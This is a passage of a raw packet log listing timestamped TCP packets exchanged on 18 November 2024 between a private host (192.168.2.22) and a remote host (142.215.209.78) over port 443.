                                                                                                                                                  Nov 18, 2024 18:22:22.264081955 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264461994 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264470100 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264514923 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.264523029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264581919 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264628887 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.264632940 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264652967 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264682055 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.264707088 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264714003 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264743090 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.264750004 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264802933 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.264848948 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.264854908 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300036907 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300090075 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.300101042 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300234079 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300276995 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.300278902 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300298929 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300333977 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.300843000 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300849915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.300899982 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.300905943 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326056957 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326112986 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.326122046 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326704979 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326747894 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.326754093 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326762915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.326790094 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.383902073 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.383912086 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.383966923 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.383977890 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.384601116 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.384654045 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.384661913 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.384773016 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.384813070 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.384819984 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.385320902 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.385365009 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.385371923 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.385648012 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.385698080 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.385704994 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.388314009 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.420311928 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.420377016 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.420388937 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.420502901 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.420547009 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.420555115 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.420867920 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.420914888 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.420922041 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.421149015 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.421189070 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.421195984 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.421233892 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.445789099 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.445843935 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.445856094 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.446053982 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.446095943 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.446105003 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.506580114 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.506635904 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.506647110 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.506963015 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507004023 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507006884 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.507021904 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507051945 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.507256031 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507266045 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507309914 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.507322073 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507636070 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.507692099 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.507699966 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.508126974 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.508176088 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.508183002 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.541879892 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.541932106 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.541941881 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542038918 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542085886 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.542084932 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542103052 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542131901 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.542284012 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542340994 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.542347908 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542808056 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.542856932 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.542865038 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.568442106 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.568500996 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.568511009 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.585299969 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.585351944 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.585371017 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625332117 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625384092 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625425100 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.625437975 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625483036 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.625719070 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625727892 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625766993 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.625776052 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625875950 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625902891 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625917912 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.625926018 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.625958920 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.627136946 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.627144098 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.627190113 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.627198935 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.627396107 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.627444029 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.627450943 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.661629915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.661701918 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.661710024 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.661956072 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.661997080 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662002087 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.662014961 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662055016 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.662112951 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662122011 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662158012 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.662166119 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662637949 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.662678957 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.662686110 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.686605930 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.686645985 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.686655045 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.686665058 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.686873913 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.686920881 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.686928034 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.704993010 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.705043077 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.705051899 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745189905 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745249987 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.745263100 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745637894 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745646954 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745688915 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.745697975 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745898008 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745913029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745944023 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.745953083 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.745991945 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.746118069 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.746131897 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.746171951 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.746180058 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.746495962 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.746545076 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.746551991 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.781760931 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.781815052 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.781825066 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.781969070 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782013893 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.782032013 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782083035 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782120943 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.782313108 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782320976 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782423019 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.782429934 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782756090 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.782799006 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.782807112 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806550980 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806606054 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.806615114 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806740046 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806776047 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806778908 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.806797981 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.806828976 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.824904919 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.824968100 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.824975014 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865401030 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865457058 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.865464926 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865699053 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865709066 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865739107 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.865746975 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.865756035 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.866043091 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.866095066 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.866101980 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.866317034 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.866362095 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.866369009 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.866745949 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.866795063 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.866801977 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902681112 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902741909 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.902754068 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902767897 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902793884 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.902816057 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902859926 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.902861118 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902874947 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902909040 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.902920008 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.902982950 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.903009892 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.926613092 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.926676035 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.926682949 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.926898956 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.926953077 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.926960945 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.945333004 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.945388079 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.945396900 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985323906 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985388041 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.985395908 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985563040 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985572100 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985621929 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.985630035 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985871077 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.985923052 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.985930920 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.986375093 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.986426115 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.986433029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.986671925 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.986728907 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.986736059 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.986996889 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:22.987047911 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:22.987056017 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022202969 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022252083 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.022262096 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022483110 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022522926 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.022530079 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022741079 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.022785902 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.022794008 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.023051023 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.023092985 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.023099899 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.046633005 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.046700001 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.046708107 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.047291994 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.047348022 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.047354937 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.065407991 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.065464020 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.065474033 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.105154991 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.105237007 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.105246067 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106194019 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106240034 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106246948 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.106256962 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106292009 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.106352091 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106372118 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106409073 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.106417894 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106561899 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.106602907 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.106610060 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.107024908 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.107067108 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.107074022 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.107217073 CET44349173142.215.209.78192.168.2.22
